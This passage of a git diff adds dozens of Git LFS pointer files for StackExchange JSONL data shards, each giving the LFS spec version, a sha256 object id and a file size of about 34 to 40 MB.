0000000000000000000000000000000000000000..5b124e055f2c0acbd1db4cea7100380a6f64525b --- /dev/null +++ b/data/stackexchange/1-1/1263_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c86765795bf6e000672f6ed7937bd7e01e998fba0e307048adffdeaff440df35 +size 35597244 diff --git a/data/stackexchange/1-1/1264_2289.jsonl b/data/stackexchange/1-1/1264_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..23bb4786c23aa5ff3aae1a93a8ef6dcce6bd7522 --- /dev/null +++ b/data/stackexchange/1-1/1264_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7c062a7fb351f82cb1685bd92b3f5f747bbf705ba6a10a1e7a5f9e848d17a4c6 +size 34567052 diff --git a/data/stackexchange/1-1/1265_2289.jsonl b/data/stackexchange/1-1/1265_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3d7d16067ed96cae354bef3bcb7276144405e88d --- /dev/null +++ b/data/stackexchange/1-1/1265_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50665ddf10352f637aaf5ef99487b3937f678a18eba2c0362c640f7e962464c4 +size 35469684 diff --git a/data/stackexchange/1-1/1266_2289.jsonl b/data/stackexchange/1-1/1266_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8670854d71d630b90a5bfb90477a917eb9af44ef --- /dev/null +++ b/data/stackexchange/1-1/1266_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0f6ffb33863459b59f6ab62be175740d62a5a12008ecd67b2719aa5f339efe6 +size 35278566 diff --git a/data/stackexchange/1-1/1267_2289.jsonl b/data/stackexchange/1-1/1267_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ddc6d7eaaf48b8402c884659f04db74d792e1f26 --- /dev/null +++ b/data/stackexchange/1-1/1267_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71a6052999b89674aa8a0fdcdf623d831b2aadf68ed674b16502965963040b83 +size 34866443 diff --git a/data/stackexchange/1-1/1268_2289.jsonl b/data/stackexchange/1-1/1268_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8c039e324e7b4dc029bbe8d8ef757bfb709aee73 --- /dev/null +++ b/data/stackexchange/1-1/1268_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:deca77efe38ddcab398eeed52e7d4ede9b9bb8ed828e5d69c08a55b4eaa94f1d +size 34726785 diff --git a/data/stackexchange/1-1/1269_2289.jsonl b/data/stackexchange/1-1/1269_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b3651e934c4adc7c44e25763a15cc0543b1a9c52 --- /dev/null +++ b/data/stackexchange/1-1/1269_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:07e7b982327790e85309650b0a6427f9ad97c846af02b7e4ef992a70edc71974 +size 34442274 diff --git a/data/stackexchange/1-1/126_2289.jsonl b/data/stackexchange/1-1/126_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7770d06b8f235453c24f7b61b13fa88b440d74b7 --- /dev/null +++ b/data/stackexchange/1-1/126_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03267cf1b693439d21880c6f11c5155547e6c153bb50e34116b340545a283038 +size 33414025 diff --git a/data/stackexchange/1-1/1270_2289.jsonl b/data/stackexchange/1-1/1270_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..07da27f9d8f380657df5cf5192cd545f968105b9 --- /dev/null +++ b/data/stackexchange/1-1/1270_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8da8942a93907f2808931133517214c3b75733707c2f391bf07a468c800627cc +size 35017895 diff --git a/data/stackexchange/1-1/1271_2289.jsonl b/data/stackexchange/1-1/1271_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd3c88f67ffc6448127ffaad06ee739e91006b02 --- /dev/null +++ b/data/stackexchange/1-1/1271_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d3160731e923afed1d9c26cf0bb20643d73975a5ac176b5e88b4b6272b87a20 +size 35050134 diff --git a/data/stackexchange/1-1/1272_2289.jsonl b/data/stackexchange/1-1/1272_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83f9603bc27a91d1fafd7f8881b6f837e9cd728e --- /dev/null +++ b/data/stackexchange/1-1/1272_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5a09d3c59f4de8fc2e69e8c143a4b922e83ff7a39b674474fbd843cdc5f092b +size 35019020 diff --git a/data/stackexchange/1-1/1273_2289.jsonl b/data/stackexchange/1-1/1273_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..06c4e334eae465ff0c2cffae30c27c20890a99c6 --- /dev/null +++ b/data/stackexchange/1-1/1273_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6b2c1e1578b6bc7d7c923b0a59a277205e2a25372ff86d13c6e9368cd0d9b47 +size 34918814 diff --git a/data/stackexchange/1-1/1274_2289.jsonl b/data/stackexchange/1-1/1274_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b9c5aa899387aa64643688cdbcbe56e9da4f0fdc --- /dev/null +++ b/data/stackexchange/1-1/1274_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8728f724fb1eec289f770bc6dde6896184d1154bba020fc39641cbc578a4ca91 +size 35517869 diff --git a/data/stackexchange/1-1/1275_2289.jsonl b/data/stackexchange/1-1/1275_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1d82cf965e6ddfd5dd199e80b2f6651b950ab456 --- /dev/null +++ b/data/stackexchange/1-1/1275_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dc5b9239aaaca02b8c46f5035b2f2821a610ef5833ee99a5dad06591384c2e60 +size 35114666 diff --git a/data/stackexchange/1-1/1276_2289.jsonl b/data/stackexchange/1-1/1276_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a2baf73e00b090783be38a81ac4741aaa1258826 --- /dev/null +++ b/data/stackexchange/1-1/1276_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f92eef10313bb8e3ebf476b70d395ecc23673c79fbbd542dab529dfddc52dc6f +size 35149841 diff --git a/data/stackexchange/1-1/1277_2289.jsonl b/data/stackexchange/1-1/1277_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..365cb91e032ca66407b958828d0ab5fa88cbe883 --- /dev/null +++ b/data/stackexchange/1-1/1277_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76aa033da41bcc08da45bc60e03b780aa02d50b0fae93be36874719e72bc1f08 +size 35058027 diff --git a/data/stackexchange/1-1/1278_2289.jsonl b/data/stackexchange/1-1/1278_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0f837619cf907d274b5fc7d6cf669ceeb974d601 --- /dev/null +++ b/data/stackexchange/1-1/1278_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7cdbd79d3fca39a5d498555546b6af0a9e22fe93b9f44352b661301860eeeefe +size 34781158 diff --git a/data/stackexchange/1-1/1279_2289.jsonl b/data/stackexchange/1-1/1279_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9a396a9200a4047ccbdab1f0ec45eb1a7f3c634f --- /dev/null +++ b/data/stackexchange/1-1/1279_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e49f4c04f06a96a3c5fc74d0a99a5dc8a608124bd412ceefc25df576f513b2b +size 34735384 diff --git a/data/stackexchange/1-1/127_2289.jsonl b/data/stackexchange/1-1/127_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..affdfe28afd62c9699730357e3ad37c6cc802a87 --- /dev/null +++ b/data/stackexchange/1-1/127_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c6e6b1842b959b40fe519d7a8cd84574a79d695f6148159d0f0924e18a18e161 +size 33793272 diff --git a/data/stackexchange/1-1/1280_2289.jsonl b/data/stackexchange/1-1/1280_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1ef8e57842d5a35fc9c670e7d539d44953259da9 --- /dev/null +++ b/data/stackexchange/1-1/1280_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c176d88b24a0343668800499b0942e56dc6eddb96969db62bbf4f3b582e82f82 +size 35444204 diff --git a/data/stackexchange/1-1/1281_2289.jsonl b/data/stackexchange/1-1/1281_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c8c8bc1837128f57589b111c4a373ee8064fcb10 --- /dev/null +++ b/data/stackexchange/1-1/1281_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0402002ea7a6ce7de74fbc0deb1f5931901789ce00bd4562c4a60d25806170a +size 34859381 diff --git a/data/stackexchange/1-1/1282_2289.jsonl b/data/stackexchange/1-1/1282_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d98d43ed391e73fe1e657c21b0c2ac81423e33a3 --- /dev/null +++ b/data/stackexchange/1-1/1282_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d5d404140d8c9f3b0357a3c766b0dcee96acf16059db950813ed2fca58d4987b +size 35052062 diff --git a/data/stackexchange/1-1/1283_2289.jsonl b/data/stackexchange/1-1/1283_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..89c1ff96016729a4a2c77037313fe6c5582f582f --- /dev/null +++ b/data/stackexchange/1-1/1283_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bec31ea894e10070218837cd853069e06077ad3f74a2ee37dea18e77e42b8717 +size 34828234 diff --git a/data/stackexchange/1-1/1284_2289.jsonl b/data/stackexchange/1-1/1284_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dbf0c7bebc52e0e90d552dff32a851c4e1f28475 --- /dev/null +++ b/data/stackexchange/1-1/1284_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5775465135d4a2ba4535d3224c0c55e88af8df2d70cfa22f5c8d11b08c2c3201 +size 34832944 diff --git a/data/stackexchange/1-1/1285_2289.jsonl b/data/stackexchange/1-1/1285_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eccc02702f6c530f0fe82272e8d49af1ca8f62e9 --- /dev/null +++ b/data/stackexchange/1-1/1285_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7b0e71ae4602fc1c497891439d0bb2f13ca6d4a0cb189ed5aeb839a4eb524883 +size 35370071 diff --git a/data/stackexchange/1-1/1286_2289.jsonl b/data/stackexchange/1-1/1286_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e86470bbd9b5b9c6671c01464afcaf39a798aac --- /dev/null +++ b/data/stackexchange/1-1/1286_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19f59d8caebdb501f58596df83479db007ddb5989589c474027e22c21212d56e +size 34934049 diff --git a/data/stackexchange/1-1/1287_2289.jsonl b/data/stackexchange/1-1/1287_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3582f5fc15839efe37b094159bf62c276a36df88 --- /dev/null +++ b/data/stackexchange/1-1/1287_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12b88091b97ba55e832c3bb08f9da55a47288ee04895b48e27de6f4d70490fb4 +size 34793415 diff --git a/data/stackexchange/1-1/1288_2289.jsonl b/data/stackexchange/1-1/1288_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a2f1ddef1090f755012012e67a6ecd4d5264dd7f --- /dev/null +++ b/data/stackexchange/1-1/1288_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1deb8ce89ba262796db07fc2bc203789c6986d4483314727b5b504cfe56afc73 +size 34113834 diff --git a/data/stackexchange/1-1/1289_2289.jsonl b/data/stackexchange/1-1/1289_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dfaa58f6a0a36f7dc3e013f2fbaaa627bc259fe8 --- /dev/null +++ b/data/stackexchange/1-1/1289_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:984ecd85bc7e865937690c389ebf59656194ac65dac964c5bfda698be8ae8103 +size 39281317 diff --git a/data/stackexchange/1-1/128_2289.jsonl b/data/stackexchange/1-1/128_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4fd0453d6b0fabf811c3cb55d091be0bd66f0ab6 --- /dev/null +++ b/data/stackexchange/1-1/128_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:348f00d2fc8c3b262fb004858e920868f2cb77b72c70348b91933302ec447c70 +size 33594247 diff --git a/data/stackexchange/1-1/1290_2289.jsonl b/data/stackexchange/1-1/1290_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e584b027065e034d26c19709d61a41612680aeb0 --- /dev/null +++ b/data/stackexchange/1-1/1290_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:855ca507b25a543ce84b1e19acc28814fdb9dd24ce3458b3aef9e82c14bbec72 +size 39713460 diff --git a/data/stackexchange/1-1/1291_2289.jsonl b/data/stackexchange/1-1/1291_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..34ab44989e520b13f153bb1cf054073d343ee912 --- /dev/null +++ b/data/stackexchange/1-1/1291_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0cbd3f3ffd7d42b2231446887c8b45c75465f8be3069bfa7a9ea78750c4547a +size 39385314 diff --git a/data/stackexchange/1-1/1292_2289.jsonl b/data/stackexchange/1-1/1292_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bb9b1a9f2ad2bb42fc25682495ed693c33dc2686 --- /dev/null +++ b/data/stackexchange/1-1/1292_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7da0de1555ebee991ca7f0469548a6b6fb3d0ad2198438d82a4bd184d37677f4 +size 39487518 diff --git a/data/stackexchange/1-1/1293_2289.jsonl b/data/stackexchange/1-1/1293_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f719824c5ed1a44f672f227a7235c1e1791573e0 --- /dev/null +++ b/data/stackexchange/1-1/1293_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d2f06140ccbd8def02c7f394c3a6bde2ab94683d913368aae9c6fbcb63d3d184 +size 39479863 diff --git a/data/stackexchange/1-1/1294_2289.jsonl b/data/stackexchange/1-1/1294_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f961d7d53943c30f7a2c99dd0dae152ce6234f6 --- /dev/null +++ b/data/stackexchange/1-1/1294_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb3df592e5507dbbb23fca68b4e81b0fefb6a5e5bf82a5653a7b6a6d22ad6501 +size 40003201 diff --git a/data/stackexchange/1-1/1295_2289.jsonl b/data/stackexchange/1-1/1295_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0771a2dfd63bc4c7724ab8c805582149ab7c0f69 --- /dev/null +++ b/data/stackexchange/1-1/1295_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:60a2766fc729300fff02063fc49ffca3ccba34d65d160632163f582ab71fc5f1 +size 38998134 diff --git a/data/stackexchange/1-1/1296_2289.jsonl b/data/stackexchange/1-1/1296_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d3676496334326c6396aa1b7436153226f72b2f1 --- /dev/null +++ b/data/stackexchange/1-1/1296_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c18759e61ec95c00856bce156a3f490b07ba2ff54bafb3f04fc81a6b753e2635 +size 39185972 diff --git a/data/stackexchange/1-1/1297_2289.jsonl b/data/stackexchange/1-1/1297_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..57bc563509f9fb136093187f1dc60f7148c9696a --- /dev/null +++ b/data/stackexchange/1-1/1297_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:877172cfc3e936241fa934f18c000a7971d6cd2772d79ed96ba5510c15560782 +size 39662612 diff --git a/data/stackexchange/1-1/1298_2289.jsonl b/data/stackexchange/1-1/1298_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2be4ec6dfbab65f0f57d86b5053f9945ca8bfa7d --- /dev/null +++ b/data/stackexchange/1-1/1298_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:849652acce1a8dcd713a8371f3c2a12109cfd6a6f507dc280b6cf23cd0f20362 +size 39362034 diff --git a/data/stackexchange/1-1/1299_2289.jsonl b/data/stackexchange/1-1/1299_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a43d1eed6894d3e58386e512e294785a5a7df7ef --- /dev/null +++ b/data/stackexchange/1-1/1299_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:59095907ab9f08f64ba1d7b84d38c5ab85b6f9ab991dce64f4cdbbf73374d56f +size 39743543 diff --git a/data/stackexchange/1-1/129_2289.jsonl b/data/stackexchange/1-1/129_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0ee47ccd620903d5f65d6bdd0155c50e9615d47 --- /dev/null +++ b/data/stackexchange/1-1/129_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b93e9e0a9c148b103963c21f53b15d1e679f63d253b6fd0d7c67609b6babf9f1 +size 33601495 diff --git a/data/stackexchange/1-1/12_2289.jsonl b/data/stackexchange/1-1/12_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d07a493a77964616687cf7e8c4e906d4a0a70a2b --- /dev/null +++ b/data/stackexchange/1-1/12_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:535fc688f9cf433aa4493def6e7285d71801566c29560f29242f44c94906068e +size 36048550 diff --git a/data/stackexchange/1-1/1300_2289.jsonl b/data/stackexchange/1-1/1300_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae998750c613c6a13952584aec152186e952b952 --- /dev/null +++ b/data/stackexchange/1-1/1300_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d95ce121779cc7cdbd5d3d3fcb7b36adb2a90283b71cca9582f8ee4222eeb59c +size 39511462 diff --git a/data/stackexchange/1-1/1301_2289.jsonl b/data/stackexchange/1-1/1301_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c1d7578dd45f601e3005b7a7c810d4c53c69eb6b --- /dev/null +++ b/data/stackexchange/1-1/1301_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7248d2393152d8e24fdefbbe86c501e333a2701fe2d24acf158766e51f30814e +size 39593912 diff --git a/data/stackexchange/1-1/1302_2289.jsonl b/data/stackexchange/1-1/1302_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..65fc403c4fdbd8c7debcb5a0d7e2ade0df597b2f --- /dev/null +++ b/data/stackexchange/1-1/1302_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d4662f426c019fb8e87bf4a66a957fbb89dbdac14da41f6e651c5cbefab07e8f +size 40187557 diff --git a/data/stackexchange/1-1/1303_2289.jsonl b/data/stackexchange/1-1/1303_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5aa39581fce64253b56d2c0cbeec5d1f331133de --- /dev/null +++ b/data/stackexchange/1-1/1303_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2257b078235843da646474744a38b0ebf0811e2d3480f76c3b9f05ccc96452fe +size 38977960 diff --git a/data/stackexchange/1-1/1304_2289.jsonl b/data/stackexchange/1-1/1304_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..41a8e989b0a9233f3fdd7889e0f9f0f214c1a213 --- /dev/null +++ b/data/stackexchange/1-1/1304_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a9a6dc0cafb601cdb74f080ab10c2fd6f11fe38918a973b4da51adb33eedfd3 +size 39276239 diff --git a/data/stackexchange/1-1/1305_2289.jsonl b/data/stackexchange/1-1/1305_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3145302841552f11c4e02d2d440b98acf27be970 --- /dev/null +++ b/data/stackexchange/1-1/1305_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e4b7fd2b323922fa860130162838ac8f1fe5072a687919e4f46fd77ef2cc5466 +size 39358105 diff --git a/data/stackexchange/1-1/1306_2289.jsonl b/data/stackexchange/1-1/1306_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ecbcaa752c4067de8af06bb0e15e09b10115476c --- /dev/null +++ b/data/stackexchange/1-1/1306_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6b659308b0ae56c9d03bf4e11fd4a3c918cf7a0efeed1268fa4f528f1ed3a6d +size 39878591 diff --git a/data/stackexchange/1-1/1307_2289.jsonl b/data/stackexchange/1-1/1307_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..56da997958919fa9d99b38e29816d23f84287197 --- /dev/null +++ b/data/stackexchange/1-1/1307_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab7bc71948d86109978b5d3f568f28e1bf973d50b7f69b9e8f23e3f8fb565f79 +size 39360843 diff --git a/data/stackexchange/1-1/1308_2289.jsonl b/data/stackexchange/1-1/1308_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d1ce5c0a1db8e0a5ce3362a2ff3ebd357f64a905 --- /dev/null +++ b/data/stackexchange/1-1/1308_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:37aaa97f9db736d8453e4d39accf2c25c636e63ab9a4fb713696569f2ec2d9aa +size 39872545 diff --git a/data/stackexchange/1-1/1309_2289.jsonl b/data/stackexchange/1-1/1309_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..072d82db2f352c5601af2a5e31958307df86f18c --- /dev/null +++ b/data/stackexchange/1-1/1309_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71a443d09de2d30f5b9b172429c0eeedcc8f39454d02b18ff012468cf8c99ec1 +size 39802569 diff --git a/data/stackexchange/1-1/130_2289.jsonl b/data/stackexchange/1-1/130_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2d987344824f83fe0986adcd6da9a2962bb939ea --- /dev/null +++ b/data/stackexchange/1-1/130_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d77bf0feb76cd32dc96c83ebe5e73b9e9fd6096bdee754a5b26a874053af122b +size 33858895 diff --git a/data/stackexchange/1-1/1310_2289.jsonl b/data/stackexchange/1-1/1310_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..59c8d70041a7880946c454a050d0ee9a0d778ed9 --- /dev/null +++ b/data/stackexchange/1-1/1310_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b81ae052ccc50b05d74513982f63f13233437f574df7a19deaf92f88cc3fef63 +size 39602008 diff --git a/data/stackexchange/1-1/1311_2289.jsonl b/data/stackexchange/1-1/1311_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9dbf437d346c92368340f399d5b59380f24cf23d --- /dev/null +++ b/data/stackexchange/1-1/1311_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e7ca00089860b53e7f0f34df6c188badcaf78ddd67a0b2ddc51303d4a21fb99e +size 39817908 diff --git a/data/stackexchange/1-1/1312_2289.jsonl b/data/stackexchange/1-1/1312_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..72b1e127832219c6d4e9c56aa7e43b1ba3da31df --- /dev/null +++ b/data/stackexchange/1-1/1312_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f799ff63ba3b38970e66395a0d73d163d11f4c337f6ba311f9debbb182e73aba +size 39843809 diff --git a/data/stackexchange/1-1/1313_2289.jsonl b/data/stackexchange/1-1/1313_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32ae13535702d7aee7fd0860f051eb19c442cd43 --- /dev/null +++ b/data/stackexchange/1-1/1313_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:499fc125f918cdb13450d92e441ba89b2a21c67211655c7ea418f8ed84de8b6d +size 39706789 diff --git a/data/stackexchange/1-1/1314_2289.jsonl b/data/stackexchange/1-1/1314_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c9f5dc566e71715ebe3903d4bd0290d1b5206e43 --- /dev/null +++ b/data/stackexchange/1-1/1314_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ced061123550442fff32d85a2874e050d395362a9e7bf61f286a8c2c50190b6b +size 39552017 diff --git a/data/stackexchange/1-1/1315_2289.jsonl b/data/stackexchange/1-1/1315_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1cbeaa72456f8658b73f8c887f849535f1f6bc09 --- /dev/null +++ b/data/stackexchange/1-1/1315_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:16edea2dca19c3bf47ebb887a199eb5d852295d888669a1a11347c144bff1ffc +size 39683394 diff --git a/data/stackexchange/1-1/1316_2289.jsonl b/data/stackexchange/1-1/1316_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d304ffb21dbbd2c59d6bd96d4ec97617f677fa8d --- /dev/null +++ b/data/stackexchange/1-1/1316_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:655f1e3becf5fc9f566d03b14fd9ea47dd743a329c7779b14c214ad9e4a59930 +size 39721844 diff --git a/data/stackexchange/1-1/1317_2289.jsonl b/data/stackexchange/1-1/1317_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fabc28c3d80c16953d3f85a41b28357e3a3f09fd --- /dev/null +++ b/data/stackexchange/1-1/1317_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fcb3d913075183dd0687cdd29c61262dad9817060800c5988e89caee6ae1bcca +size 39407996 diff --git a/data/stackexchange/1-1/1318_2289.jsonl b/data/stackexchange/1-1/1318_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9c43cfbb6b7ca3c5eeb099b32f9c1412a37b6932 --- /dev/null +++ b/data/stackexchange/1-1/1318_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dfac2286af7e7d7b1395d766f2f8024287c7bb7b4bbd6e8d64d8b243a46233e6 +size 39937972 diff --git a/data/stackexchange/1-1/1319_2289.jsonl b/data/stackexchange/1-1/1319_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fe62205be7986516c47987dfd45f9dcbfee36b45 --- /dev/null +++ b/data/stackexchange/1-1/1319_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05ee9e8fcc33aa94eb643a81a2544b72050864540dfcbddc4c3323e8af8832f7 +size 39557195 diff --git a/data/stackexchange/1-1/131_2289.jsonl b/data/stackexchange/1-1/131_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a9384d163bdf7f9dd593311eb92d3554f6db4ca --- /dev/null +++ b/data/stackexchange/1-1/131_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:58df0230b4a20d6619ca4eac19be7d247feb469bc6edbaad33cb52363ffc62fc +size 33760496 diff --git a/data/stackexchange/1-1/1320_2289.jsonl b/data/stackexchange/1-1/1320_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..43fe19464db0db0ed1605ac4d4638e016a5a67db --- /dev/null +++ b/data/stackexchange/1-1/1320_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f3ce058996da74bbecd9b243b685249468d06fb370ad6ae898185fcb17ed6ca7 +size 38720994 diff --git a/data/stackexchange/1-1/1321_2289.jsonl b/data/stackexchange/1-1/1321_2289.jsonl new file mode 100644 index 